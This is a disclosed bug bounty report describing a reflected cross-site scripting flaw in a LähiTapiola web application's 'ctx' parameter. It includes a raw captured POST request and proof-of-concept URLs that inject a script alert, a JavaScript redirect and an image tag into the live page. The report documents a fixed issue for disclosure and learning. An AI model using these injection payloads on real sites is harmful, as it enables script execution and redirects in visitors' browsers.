ReportLink:https://hackerone.com/reports/201137
WeaknessName:Cross-site Scripting (XSS) - Generic
Reporter:https://hackerone.com/yonm13
ReportedTo:LocalTapiola(localtapiola)
BountyAmount:150.0
Severity:medium
State:Closed
DateOfDisclosure:06.03.2017 13:53:51

Summary:
##Issue

The reporter found a repeated XSS in several small applications. The error was systemic in the sense that it was duplicated in all of these applications. 

##Fix

The issue was investigated and found to be valid.

##Reasoning

The reported case was valid and within scope.  The applications as such, are not very critical and do not handle any customer information.  The reporter was awarded with a bonus for not making each and every URL a separate report. We like that.
## Basic report information
**Summary:** The ctx parameter in http://viestinta.lahitapiola.fi/webApp/iltakoulu_varkaus, can be exploited to perform an XSS Attack.

**Description:** When a user fills the form in the webpage, a POST request is sent to the server with multiple parameters
```
POST /webApp/iltakoulu_varkaus HTTP/1.1
Host: viestinta.lahitapiola.fi
Content-Length: 4700
Cache-Control: max-age=0
Origin: http://viestinta.lahitapiola.fi
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://viestinta.lahitapiola.fi/webApp/iltakoulu_varkaus
Accept-Language: en-US,en;q=0.8
Cookie: AMCVS_8041A77B5656DBF07F000101%40AdobeOrg=1; AMCV_8041A77B5656DBF07F000101%40AdobeOrg=-227196251%7CMCIDTS%7C17190%7CMCMID%7C86390830056295906801442850595672988826%7CMCAAMLH-1485781637%7C6%7CMCAAMB-1485871297%7CNRX38WO0n5BH8Th-nqAG_A%7CMCOPTOUT-1485273697s%7CNONE%7CMCAID%7C2C3542A405309EB2-600003002000682B; s_sq=%5B%5BB%5D%5D; __utma=122060566.635463889.1485172763.1485266497.1485266697.3; __utmc=122060566; __utmz=122060566.1485266697.3.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __utmv=122060566.|2=Alueyhtio=Iisalmi=1; s_cc=true; uuid230=ba1a1122-1bfa-4b50-87e0-1f5c4b6cb74e; nlid=1e519fb|1c42278e; _ga=GA1.3.635463889.1485172763; ARCSessionInfo=39%7C1485172763414; _ga=GA1.2.635463889.1485172763; vlmref=131698714558516200; googtrans=/fi/en; googtrans=/fi/en
Connection: close

registrationLocationId=464570262&webAppLogRcpData_Etunimi=test&webAppLogRcpData_Sukunimi=test&webAppLogRcpData_Yrityksen_nimi_=Test2&webAppLogRcpData_Toimiala=None&webAppLogRcpData_Puhelinnumero=%2B197358661234&webAppLogRcpData_Sahkoposti=tester%40test.com&webAppLogRcpData_Postinumero_=12312333&webAppLogRcpData_Erikoisruokavalio_laktoositon=1&webAppLogRcpData_Erikoisruokavalio_muu=&webAppLogRcpData_Yrityksen_koko=Yksinyritt%C3%A4j%C3%A4&webAppLogRcpData_Kuinka_kauan_olet_toiminut_yrittajana__=yli+5+v&webAppLogRcpData_Yrittajan_ika=alle+30+v&webAppLogRcpData_Elon_asiakas=1&webAppLogRcpData_Oletko_aikaisemmin_kaynyt_Yrittajan_Iltakoulussa_=Kyll%C3%A4&webAppLogRcpData_Tietojani_saa_kayttaa=Ei+ollenkaan.&webAppLogRcpData_Yhteystietojen_kaytto=Kyll%C3%A4&webAppLogRcpData_Ennakkokysymys=%27&webAppLogRcpData_Uutiskirjeentilaus=En&ctx=%3Cctx+lang%3D%22en%22+_target%3D%22web%22+webApp-id%3D%2253976056%22+_folderModel%3D%22nmsRecipient%22+deliveryId%3D%22474097550%22%3E%3CuserInfo+xmlns%3ASOAP-ENV%3D%22http%3A%2F%2Fschemas.xmlsoap.org%2Fsoap%2Fenvelope%2F%22+xmlns%3Ans%3D%22urn%3Axtk%3Asession%22+xmlns%3Axsd%3D%22http%3A%2F%2Fwww.w3.org%2F2001%2FXMLSchema%22+xmlns%3Axsi%3D%22http%3A%2F%2Fwww.w3.org%2F2001%2FXMLSchema-instance%22+datakitInDatabase%3D%22true%22+homeDir%3D%22%22+instanceLocale%3D%22en-US%22+locale%3D%22en-US%22+login%3D%22webapp%22+loginCS%3D%22Web+applications+agent+%28webapp%29%22+loginId%3D%223290%22+noConsoleCnx%3D%22true%22+orgUnitId%3D%220%22+theme%3D%22%22+timezone%3D%22Europe%2FHelsinki%22%3E%3Clogin-right+right%3D%22admin%22%2F%3E%3C%2FuserInfo%3E%3Ctimezone+current%3D%22Europe%2FHelsinki%22+changed%3D%22false%22%2F%3E%3Cvars%3E%3CerrorEmail%3E0%3C%2FerrorEmail%3E%3CregularFull%3E0%3C%2FregularFull%3E%3Ceventfull%3E0%3C%2Feventfull%3E%3Cheader%3Ehttp%3A%2F%2Fviestinta.lahitapiola.fi%2Fres%2Ftapiola%2F36d66e62aab33e26a6d6e968b1ce6193.jpg%3C%2Fheader%3E%3Cnoid%3E1%3C%2Fnoid%3E%3Csparebooking%3E0%3C%2Fsparebooking%3E%3CregisteredEmail%3E0%3C%2FregisteredEmail%3E%3Cotsikkoteksti%3E%26lt%3Binput+placeholder%3D%22%22+size%3D%220%22+value%3D%22464570262%22+id%3D%22registrationLocationId%22+name%3D%22registrationLocationId%22+class%3D%22%22+style%3D%22%22+type%3D%22hidden%22+onkeypress%3D%22var+_this%3Dthis%3Breturn+onEnterPressed%28event%2C+function%28%29%7Bdocument.controller.setValue%28%27%2Fctx%2Fvars%2FregistrationLocationId%27%2C+_this.value%2C+%27vars_registrationLocationId%27%29%3Breturn+true%3B%7D%29%3B%22+onblur%3D%22document.controller.setValue%28%27%2Fctx%2Fvars%2FregistrationLocationId%27%2C+this.value%2C+%27vars_registrationLocationId%27%29%22%2F%26gt%3B%26lt%3BH1+class%3Dhero%26gt%3BVarkaus%26lt%3B%2FH1%26gt%3B%26lt%3BP+class%3Dhero-info%26gt%3B01.03.+17%3A30+-+20%3A30%26lt%3B%2FP%26gt%3B%26lt%3BP+class%3Dhero-place%26gt%3BWarkaus-Sali%2C+Kauppatori+4%26lt%3B%2FP%26gt%3B%3C%2Fotsikkoteksti%3E%3Cpaikkakuntateksti%2F%3E%3Chtml%3E%26lt%3Bscript%26gt%3B%0D%0Afunction+initWebAppPage%28%29%0D%0A%7B%0D%0A%09document.controller.setValue%28%27%2Fctx%2Fvars%2FregistrationLocationId%27%2C+%27464570262%27%2C+%27vars_registrationLocationId%27%29%3B%0D%0A%7D%0D%0A%0D%0AjQuery%28function%28%29%0D%0A%7B%0D%0A%09initWebAppPage%28%29%3B%0D%0A%7D%29%3B%0D%0A%26lt%3B%2Fscript%26gt%3B%0D%0A%0D%0A%3C%2Fhtml%3E%3CregistrationLocationId%3E464570262%3C%2FregistrationLocationId%3E%3C%2Fvars%3E%3CactivityHistory%3E%3Cactivity+name%3D%22page%22%2F%3E%3Cactivity+name%3D%22test2%22%2F%3E%3Cactivity+name%3D%22script6%22%2F%3E%3Cactivity+name%3D%22script5%22%2F%3E%3Cactivity+name%3D%22script3%22%2F%3E%3Cactivity+name%3D%22prefill%22%2F%3E%3C%2FactivityHistory%3E%3CwebAppLogRcpData%3E%3CEtunimi%3Etest%3C%2FEtunimi%3E%3CSukunimi%3Etest%3C%2FSukunimi%3E%3CYrityksen_nimi_%3ETest2%3C%2FYrityksen_nimi_%3E%3CToimiala%3ENone%3C%2FToimiala%3E%3CPuhelinnumero%3E%2B197358661234%3C%2FPuhelinnumero%3E%3CSahkoposti%3Etester%40test.com%3C%2FSahkoposti%3E%3CPostinumero_%3E12312333%3C%2FPostinumero_%3E%3CErikoisruokavalio_laktoositon%3E1%3C%2FErikoisruokavalio_laktoositon%3E%3CYrityksen_koko%3EYksinyritt%C3%A4j%C3%A4%3C%2FYrityksen_koko%3E%3CKuinka_kauan_olet_toiminut_yrittajana__%3Eyli+5+v%3C%2FKuinka_kauan_olet_toiminut_yrittajana__%3E%3CYrittajan_ika%3Ealle+30+v%3C%2FYrittajan_ika%3E%3CElon_asiakas%3E1%3C%2FElon_asiakas%3E%3COletko_aikaisemmin_kaynyt_Yrittajan_Iltakoulussa_%3EKyll%C3%A4%3C%2FOletko_aikaisemmin_kaynyt_Yrittajan_Iltakoulussa_%3E%3CTietojani_saa_kayttaa%3EEi+ollenkaan.%3C%2FTietojani_saa_kayttaa%3E%3CYhteystietojen_kaytto%3EKyll%C3%A4%3C%2FYhteystietojen_kaytto%3E%3CEnnakkokysymys%3E%27%3C%2FEnnakkokysymys%3E%3CUutiskirjeentilaus%3EEn%3C%2FUutiskirjeentilaus%3E%3C%2FwebAppLogRcpData%3E%3C%2Fctx%3E&userAction=next&transition=
```

The parameter "HTML" is translated directly into the Server's response, and can be abused to inject content into the page. 
The request can be narrowed down, and translated into a GET request via a parameter named 'ctx'
e.g:
Reflected XSS:
`http://viestinta.lahitapiola.fi/webApp/iltakoulu_varkaus?ctx=<ctx><vars><html>%26lt%3bscript%26gt%3balert();%3b%26lt%3b/script%26gt%3b</html></vars><activityHistory><activity+name%3d"page"/><activity+name%3d"test2"/><activity+name%3d"script6"/><activity+name%3d"script5"/><activity+name%3d"script3"/><activity+name%3d"prefill"/></activityHistory></ctx>`

Javascript Redirection (Wait for page to load):
`http://viestinta.lahitapiola.fi/webApp/iltakoulu_varkaus?ctx=<ctx><vars><html>%26lt%3bscript%26gt%3blocation.href%3d"http%3a//google.com"%3b%26lt%3b/script%26gt%3b</html></vars><activityHistory><activity+name%3d"page"/><activity+name%3d"test2"/><activity+name%3d"script6"/><activity+name%3d"script5"/><activity+name%3d"script3"/><activity+name%3d"prefill"/></activityHistory></ctx>`

IMG tag injection (at the end of the page):
`http://viestinta.lahitapiola.fi/webApp/iltakoulu_varkaus?ctx=<ctx><vars><html><img+src%3d"http%3a//i0.kym-cdn.com/photos/images/newsfeed/000/683/595/a36.jpg"+/></html></vars><activityHistory><activity+name%3d"page"/><activity+name%3d"test2"/><activity+name%3d"script6"/><activity+name%3d"script5"/><activity+name%3d"script3"/><activity+name%3d"prefill"/></activityHistory></ctx>`

**Domain:** viestinta.lahitapiola.fi

## Browsers / Apps Verified In:

  All Browsers

## Steps To Reproduce:

(Add details for how we can reproduce the issue)

  1. Access one of the URLs provided: (What seems like a bug in the Markdown's parsing mechanism was bypassed by adding a tailing '>' to the URLs)
       - [Javascript Alert](http://viestinta.lahitapiola.fi/webApp/iltakoulu_varkaus?ctx=<ctx><vars><html>%26lt%3bscript%26gt%3balert();%3b%26lt%3b/script%26gt%3b</html></vars><activityHistory><activity+name%3d"page"/><activity+name%3d"test2"/><activity+name%3d"script6"/><activity+name%3d"script5"/><activity+name%3d"script3"/><activity+name%3d"prefill"/></activityHistory></ctx>>)
       - [Google.com Redirection](http://viestinta.lahitapiola.fi/webApp/iltakoulu_varkaus?ctx=<ctx><vars><html>%26lt%3bscript%26gt%3blocation.href%3d"http%3a//google.com"%3b%26lt%3b/script%26gt%3b</html></vars><activityHistory><activity+name%3d"page"/><activity+name%3d"test2"/><activity+name%3d"script6"/><activity+name%3d"script5"/><activity+name%3d"script3"/><activity+name%3d"prefill"/></activityHistory></ctx>>)
       - [IMG Tag injection](http://viestinta.lahitapiola.fi/webApp/iltakoulu_varkaus?ctx=<ctx><vars><html><img+src%3d"http%3a//i0.kym-cdn.com/photos/images/newsfeed/000/683/595/a36.jpg"+/></html></vars><activityHistory><activity+name%3d"page"/><activity+name%3d"test2"/><activity+name%3d"script6"/><activity+name%3d"script5"/><activity+name%3d"script3"/><activity+name%3d"prefill"/></activityHistory></ctx>>)

## Additional material

  * See attached POCs

## Related reports, best practices

  * [OWASP-recommendations]